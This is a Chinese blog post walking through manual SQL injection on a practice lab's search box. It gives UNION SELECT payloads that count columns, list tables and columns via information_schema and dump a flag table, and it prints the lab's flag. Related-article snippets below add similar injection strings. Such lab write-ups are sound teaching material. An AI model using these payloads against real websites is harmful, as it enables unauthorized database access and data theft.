SQL注入:搜索型盲注(手工注入)

最新推荐文章于 2024-08-01 16:42:22 发布
最新推荐文章于 2024-08-01 16:42:22 发布
阅读量1.2k 收藏 6
点赞数 2
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qxx5203/article/details/125935208
版权

URL:http://47.103.94.191:8002/search.php

进入靶场后出现此界面,在登录界面用户名输入1’,密码任意判断一下是数字型还是字符型,页面异常。再次输入1’ and 1=1 #,看看有没有注入点,页面异常。也尝试了其他手工注入的方法,仍然异常。

 在界面中还有一搜索留言,我们在搜索框中发现注入点  

一、判断是否有注入点

搜索框内  输入a正常回显

                输入a'报错

二、 猜解列名数量(字段数)

a' order by 1 #

6页面显示不正常,发现最大正常位是5

 三、查看报错位(1,2,3,4,报错)

a' union select 1,2,3,4,5 #

四、获取数据库信息

获取数据库名称(dwvs

数据库表的信息

(account,caffaine,dwvs_admin_message,dwvs_message,dwvs_user_message,dwvs_vulnerability,flag,news,user)

a' union select 1,2,database(),group_concat(table_name),5 from information_schema.tables where table_schema=database() #

查找flag表下的列

数据库列的信息:id,flag

a' union select 1,2,database(),group_concat(column_name),5 from information_schema.columns where table_name='flag' #

 

获取flag

a' union select 1,2,database(),flag,5 from dwvs.flag #

提交flag

flag{8bce2844bc098845261fad79a3a56215}

差一点成熟。
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【漏洞挖掘】——101、搜索注入深入刨析
Fly_鹏程万里
06-21 195
网站为了用户便于搜索网站中的资源往往会加入搜索功能,如果底层的代码忽略了对搜索变量的过滤,则有可能会造成了搜索注入漏洞(又称文本框注入),对于常见的搜索框而言,后台常用的SQL语句如下所示,在这里参数如果未经过滤直接拼接到SQL语句中则存在注入注入方法类似于字符注入,不过在这里我们需要闭合的符合就变成了"%",其余的基本上一致。
《网络安全自学教程》- SQL注入之布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 2368
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
SQL注入——搜索注入
最新发布
YJ_12340的博客
08-01 845
一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在;其中又分为 POST/GET ,GET的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的 method="get" 属性来区分是get还是post。搜索注入又称为文本框注入
SQL注入系列之PHP+Mysql手动注入(三)----搜索(POST/GET)
fendo
02-26 1万+
一、搜索注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
SQL注入搜索注入
qxx5203的博客
07-22 2642
SQL语句selectusername,idfromadminwhereusernamelike'%$name%'"%"匹配任何字符,"like"的意思就是像,"$"变量。正常回显,却无法判断字段数,也无法查看报错位。数据库表的信息(blog,heroes,movies,进入靶场后出现此界面,在登录界面输入。8页面显示不正常,发现最大正常位是。数据库列的信息id,num,判断一下是数字还是字符。账号密码错误或用户未注册!搜索框内输入a正常回显。...
搜索框注入
热门推荐
cnbird's blog
07-16 2万+
如果没有说错的话,在国内应该是lake2最早提出搜索文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。以前很傻以为搜索注入就是直接在文本框中输入and 1=1 和and 1=2,结果每次都是出现同样的页面,说是什么没有找到你搜索的关键词,汗啊 曾经有个人就说过,中国的黑客满地都是啊;而且有一项调查显示,中国有超过50%的大学生想成为黑客,这也许就是
SQL注入 (中级篇)搜索注入
weixin_41472455的博客
05-06 704
搜索注入: 其实对于初学SQL注入,并不需要区分注入。 但是要理解搜索注入,首先需要理解SQL搜索语句,举个例子 我们希望从 "Persons" 表中选取居住在包含 "lon" 的城市里的人: 我们可以使用下面的 SELECT 语句: SELECT * FROM Persons WHERE City LIKE '%lon%' 通常来讲 SQL注入只是后台的 数据库查询语...
SQL注入——盲注手工注入
bosskim的博客
06-13 1229
温故知新,学习sql注入分类
SQL注入(盲注)
a12332251的博客
12-07 932
SQL
SQL注入--报错和盲注
qq_57307348的博客
02-10 1916
回顾之前的文章(sql注入基础),了解到sql注入的分类有 基于正常回显 联合查询 union select 基于错误回显 floor() extractvalue()   updatexml() 盲注 布尔盲注 基于时间盲注sleep() 报错注入的前提 页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点: 不需要显示位 缺点: 需要输出mysql_error()的...
墨者学院-SQL注入漏洞测试(报错盲注
weixin_42939822的博客
03-30 5164
墨者学院-SQL注入漏洞测试(报错盲注
SQL--搜索注入
weixin_30652879的博客
07-25 222
查询语句:SELECT * from sqltest where names like'%要查询的关键字%' 在搜索框内输入1%' and 1=1 and '%'='正常回显; 在搜索框内输入1%' and 1=2 and '%'='报错则存在注入, 之后搜索关键词。 转载于:https://www.cnblogs.com/ldsec/p/5704075.html...
mysql搜索注入_SQL注入系列之PHP+Mysql手动注入(三)----搜索(POST/GET)
weixin_39668965的博客
01-19 250
一、搜索注入简介与原理1)简介一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在:其中又分为POST/GET,GET的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索注入又称为文本框注入...
mysql搜索注入_pikachu-搜索注入 #手工注入
weixin_28745525的博客
02-28 341
1.搜索注入漏洞产生的原因:在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索注入漏洞,又称文本框注入。2.搜索注入的类:同其他注入相同,由于提交表单的不同,可分为GET(多出现于网站上的搜索)和POST(多出现于用户名的登录搜索匹配),搜索注入是国内系统中普遍存在的漏洞。3.原理分析:select us...
SQL注入:数字、字符搜索
qq_38719025的博客
03-11 5643
一、注入点的判断 对连接[http://10.0.0.26:8080/Less-2/?id=1]是否是注入点进行判断。 1、变换id 参数 当我们变换id 参数(2+1|2-1)的时候,发现同一个页面,页面展现出不同的内容。也就是说,数据库中的内容会回显到网页中来。 初步判定,id 参数会带入数据库查询,根据不同的id 查询数据库,得到不同的内容。 猜测后台执行的SQL 语句大致结构为: select * fro...
SQL注入搜索注入
Ethan024的博客
03-23 453
SQL注入搜索注入(本文仅供学习或参考) 实验准备: 皮卡丘靶场—SQL Injection—搜索注入 实验步骤: 输入任意字母,以‘k’为例,进行模糊查询,查看结果: 猜想数据库查询语句: select * from table where username like ‘%k%’ ; 构造payload,制造闭合:k%’ or 1=1 # ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值